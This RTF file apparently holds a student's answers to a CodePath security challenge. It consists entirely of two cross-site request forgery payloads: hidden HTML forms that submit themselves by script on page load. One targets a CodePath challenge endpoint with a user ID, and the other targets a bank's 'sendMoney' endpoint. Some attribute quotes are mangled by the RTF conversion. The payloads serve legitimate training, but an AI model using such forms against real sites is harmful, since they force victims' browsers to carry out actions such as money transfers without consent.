{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fmodern\fcharset0 Courier;\f1\froman\fcharset0 Times-Roman;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;}
\margl1440\margr1440\vieww33400\viewh21000\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs24 \cf2 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 <form name="csrfForm" action="https://security.codepath.com/user/csrfchallengetwo/plusplus" method="POST">\
 <input type="hidden" name=\'93userid\'94 value="
\f1 ba867794e32d1b410c4b8d629f87a4085cd349da
\f0 " />\
 <input type="submit"/>\
</form>\
<script>\
 document.csrfForm.submit();\
</script>\
\
\
\
\
<form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST">\
 <input type="hidden" name=\'93\'94 value="hacker" />\
 <input type="submit"/>\
</form>\
<script>\
 document.csrfForm.submit();\
</script>\
}